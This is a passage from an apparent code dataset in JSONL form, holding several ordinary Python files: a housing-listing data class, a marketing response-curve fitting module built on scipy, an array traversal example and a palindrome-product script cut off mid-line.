#显示图片\n","sub_path":"step1/VOC-RCF/rcf/rcf_top/logs/print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"410693661","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: zengyuetian\n# 此代码仅供学习与交流,请勿用于商业用途。\n# 二手房信息的数据结构\n\n\nclass ErShou(object):\n def __init__(self, district, area, name, price, desc, pic, \n url, xiaoqu_url, xiaoqu_name, hid, unit_price):\n self.district = district\n self.area = area\n self.price = price\n self.name = name\n self.desc = desc\n self.pic = pic\n self.url = url\n self.xiaoqu_url = xiaoqu_url\n self.xiaoqu_name = xiaoqu_name\n self.hid=hid\n self.unit_price=unit_price\n\n def text(self):\n return ','.join([self.url,\n self.hid,\n self.district,\n self.area,\n self.xiaoqu_name,\n self.name,\n self.price,\n self.unit_price,\n self.desc,\n '\"\"\"'+self.pic+'\"\"\"',\n 
])\n\n\n","sub_path":"lib/item/ershou.py","file_name":"ershou.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"366855956","text":"import pandas as pd\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom math import atan, exp\n\n\nclass CurveConverter:\n def __init__(self, functionalforms, curves, coefficient_cols, logger):\n self.functionalforms = functionalforms\n self.curves = curves\n self.coefficient_cols = coefficient_cols\n self.coefficienta = np.array(self.curves['coefficienta'])\n self.coefficientb = np.array(self.curves['coefficientb'])\n self.coefficientc = np.array(self.curves['coefficientc'])\n self.output_curve = 'ADBUDG'\n\n self.actual_field = 'Y_actual'\n self.output_field = 'Y_adbudg'\n self.adstock_field = 'adstock'\n self.logger = logger\n\n\n def lower_case(self):\n self.functionalforms = dict((k, v.lower()) for k, v in self.functionalforms.items())\n\n def get_curve_name(self, row, field):\n return self.curves.loc[row, field]\n\n def get_curve_equation(self, formname):\n return self.functionalforms[formname]\n\n def get_coefficienta(self, row):\n return self.coefficienta[row]\n\n def curve_eval(self, coefficienta, coefficientb, coefficientc, adstock, curve_name):\n return eval(self.get_curve_equation(curve_name))\n\n def create_adstock(self, stimuli, curve_row, ntimes=5,step=10, step2=20, nrows=None):\n self.df = pd.DataFrame(columns=self.coefficient_cols)\n # self.df['Percentage'] = pd.Series(np.arange(10, 100*ntimes, step) / 100)\n self.df['Percentage'] = pd.Series(np.array(list(np.arange(10, 120, step) / 100)+ list(np.arange(120, 100*ntimes\n , step2) / 100)))\n if nrows:\n try:\n self.df = self.df.iloc[0:nrows,:]\n except:\n self.df = self.df\n\n self.df['adstock'] = self.df['Percentage'] * stimuli\n self.adstock = self.df['adstock'].values\n # print(self.coefficienta[curve_row])\n self.df['coefficienta'] = self.coefficienta[curve_row]\n self.df['coefficientb'] = self.coefficientb[curve_row]\n self.df['coefficientc'] = self.coefficientc[curve_row]\n # return self.df\n\n def scale_adstock(self, multiplier=1):\n self.adstock = self.adstock * multiplier\n\n def eval_curve(self, curve_name, output_field):\n # self.df[output_field] = self.df.eval(self.get_curve_equation(curve_name))\n self.df['curve_name'] = curve_name\n self.df[output_field] = np.vectorize(self.curve_eval)(self.df['coefficienta'], self.df['coefficientb'], self.df['coefficientc'], self.df['adstock'], self.df['curve_name'])\n self.Y_actual = self.df[output_field].values\n return self.df\n\n def eval_curve_series(self, df, curve_name, output_field, coefficienta, coefficientb\n , coefficientc):\n df['coefficienta'] = coefficienta\n df['coefficientb'] = coefficientb\n df['coefficientc'] = coefficientc\n df[output_field] = df.eval(self.get_curve_equation(curve_name))\n return df\n\n def eval_adbudg(self, input_dict):\n coefficienta = input_dict[0]\n coefficientb = input_dict[1]\n coefficientc = input_dict[2]\n self.new_adbudg = (coefficienta * ((self.adstock ** coefficientb) / ((self.adstock ** coefficientb) + (coefficientc ** coefficientb))))\n\n def set_volumes(self, actual, new):\n self.actual_volume = actual\n self.new_volume = new\n\n def get_objective_numpy(self, input_dict):\n coefficienta= input_dict[0]\n coefficientb= input_dict[1]\n coefficientc= input_dict[2]\n self.new_adbudg = (coefficienta * ((self.adstock ** coefficientb)/((self.adstock ** coefficientb) + (coefficientc ** 
coefficientb))))\n return np.sum(np.absolute(self.new_adbudg - self.Y_actual))\n\n\n def get_objective_numpy_volume(self, input_dict):\n coefficienta= input_dict[0]\n coefficientb= input_dict[1]\n coefficientc= input_dict[2]\n self.new_adbudg = (coefficienta * ((self.adstock ** coefficientb)/((self.adstock ** coefficientb) + (coefficientc ** coefficientb))))\n return np.sum(np.absolute((self.new_adbudg/self.new_volume) - (self.Y_actual/self.actual_volume)))\n\n\n def get_objective_value(self, final_curve, actual_curve):\n return np.sum(np.absolute(final_curve - actual_curve))\n\n def get_new_coeffs(self, coeffs):\n # bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy, coeffs, method='nelder-mead'# method='SLSQP'\n #, bounds=bnds\n , tol=1e-2, options={'maxiter': 10000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return np.array(model.x.tolist())\n\n def get_new_coeffs_bounds(self, coeffs):\n bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy, coeffs, method='SLSQP'\n , bounds=bnds\n , tol=1e-8, options={'maxiter': 10000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return [0, 0, 0]\n\n def get_new_coeffs_volume(self, coeffs):\n # bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy_volume, coeffs, method='nelder-mead'\n # , bounds=bnds\n , tol=1e-2, options={'maxiter': 100000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return np.array(model.x.tolist())#[0, 0, 0]\n\n def get_new_coeffs_volume_bnds(self, coeffs):\n bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy_volume, coeffs, method='SLSQP'\n , bounds=bnds\n , tol=1e-2, options={'maxiter': 100000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return [0, 0, 0]\n\n def minimize_options(self, coeffs_list, power=0):\n new_coeffs_list = []\n for i in coeffs_list:\n new_coeffs_list.append(self.get_new_coeffs_bounds(i))\n if power == 0:\n new_coeffs_list.append(self.get_new_coeffs(i))\n diff_list = []\n for new_coeff in new_coeffs_list:\n self.eval_adbudg(new_coeff)\n diff_list.append(np.sum(np.absolute(self.new_adbudg - self.Y_actual)))\n return new_coeffs_list, diff_list\n\n def minimize_options_volume(self, coeffs_list, power=0):\n new_coeffs_list = []\n for i in coeffs_list:\n new_coeffs_list.append(self.get_new_coeffs_volume_bnds(i))\n new_coeffs_list.append(self.get_new_coeffs_volume(i))\n diff_list = []\n for new_coeff in new_coeffs_list:\n self.eval_adbudg(new_coeff)\n diff_list.append(np.sum(np.absolute(self.new_adbudg - self.Y_actual)))\n return new_coeffs_list, diff_list\n\n def convert_curve(self, curves_4, coeffs, form_col, _spend_mean_col, _stimuli_col, _stimuli_type_col, curve_row):\n stimuli = curves_4[_spend_mean_col][curve_row]\n curve_name = self.get_curve_name(curve_row, form_col)\n power = 0\n coeffs[1] = 1\n if curve_name in ['POWER']:\n stimuli = 40000 / (curves_4['coefficienta'][curve_row] + 10)\n power = 1 if curves_4['coefficienta'][curve_row] < 5 else 0\n coeffs[1] = curves_4['coefficientb'][curve_row]\n if curve_name in ['LINEAR']:\n stimuli = 1000 / curves_4['coefficienta'][curve_row]\n if curve_name in ['NEGATIVE_EXPONENTIAL']:\n stimuli = max(curves_4['coefficienta'][curve_row], stimuli)\n # print(curves_4[_stimuli_type_col][curve_row])\n if (curves_4[_stimuli_type_col][curve_row] == 'Impressions'):\n stimuli = 10000000\n # print(stimuli)\n\n self.create_adstock(stimuli, curve_row, ntimes=5, 
step=1, step2=10)\n df = self.eval_curve(curve_name, 'Y_actual')\n if curve_name == 'ADBUDG':\n new_coeffs = df[['coefficienta', 'coefficientb', 'coefficientc']].iloc[0, :].values\n else:\n coeffs_sub = df[['coefficienta', 'coefficientb', 'coefficientc']].iloc[0, :].values\n coeffs_sub[0] = max(coeffs_sub[0], 1)\n coeffs_sub[1] = 1 if curve_name != 'POWER' else coeffs_sub[1]\n coeffs_sub[2] = max(coeffs_sub[2], 1) if curve_name != 'ATAN_LINEAR' else stimuli\n\n import warnings\n warnings.filterwarnings(\"error\")\n\n if curve_name in ['LINEAR']:\n try:\n new_coeffs = self.get_new_coeffs_bounds(coeffs.copy())\n except Warning:\n new_coeffs = self.get_new_coeffs(coeffs.copy())\n else:\n warnings.filterwarnings(\"ignore\")\n # new_coeffs = converter.get_new_coeffs(coeffs.copy())\n new_coeffs_list, diff_list = self.minimize_options([coeffs_sub, coeffs.copy()], power)\n result = np.all(diff_list == diff_list[0])\n if (result) & (power == 0):\n self.logger.info('----- Reducing the scale of stimuli to fit the curve better')\n self.create_adstock(stimuli / 10, curve_row, ntimes=5, step=1, step2=30)\n df = self.eval_curve(curve_name, 'Y_actual')\n new_coeffs_list, diff_list = self.minimize_options([coeffs_sub, coeffs.copy()])\n new_coeffs = new_coeffs_list[np.argmin(diff_list)]\n self.eval_adbudg(new_coeffs)\n comparison_df = pd.DataFrame(data=[self.adstock, self.Y_actual, self.new_adbudg]).T\n comparison_df.columns = [_stimuli_col, 'Actual', 'New_Adbudg']\n comparison_df['CurveID'] = curve_row\n\n return pd.DataFrame(new_coeffs).T, comparison_df\n\n def convert_curve_group(self, curves_4, coeffs, form_col, _spend_mean_col, _stimuli_col, _stimuli_type_col, i, j):\n results = []\n comparison_df_final = []\n for curve_row in range(i, j):\n new_coeffs, comparison_df = self.convert_curve(curves_4, coeffs, form_col, _spend_mean_col, _stimuli_col,\n _stimuli_type_col, curve_row)\n results.append(new_coeffs)\n comparison_df_final.append(comparison_df)\n return results, comparison_df_final\n\n\n\n\n","sub_path":"CurveAggregation/Proxy/src/helpers/curve_converter.py","file_name":"curve_converter.py","file_ext":"py","file_size_in_byte":10495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"547514415","text":"# Python Implementation\n# Array Traversal\n# Printing All Array Elements\n\nfrom array import *\n\narray1 = array('i', [1,2,3,4,5,6,7,8,9,10])\n\nprint(\"Array Elements:\")\n\nfor x in array1:\n print(x)\n","sub_path":"Data Structure/Array/python/array_traverse.py","file_name":"array_traverse.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"484279271","text":"def isPalindrome(number):\r\n return str(number) == str(number)[::-1]\r\n\r\ntest=int(input())\r\n\r\nfor i in range(test):\r\n\r\n first=int(input())\r\n\r\n factors=[0,0]\r\n found=False\r\n\r\n while(not found):\r\n\r\n while not isPalindrome(first):\r\n first-=1\r\n\r\n palin = first\r\n first-=1\r\n\r\n for i in range(999,99,-1):\r\n if ((palin//i) >999 or (i*i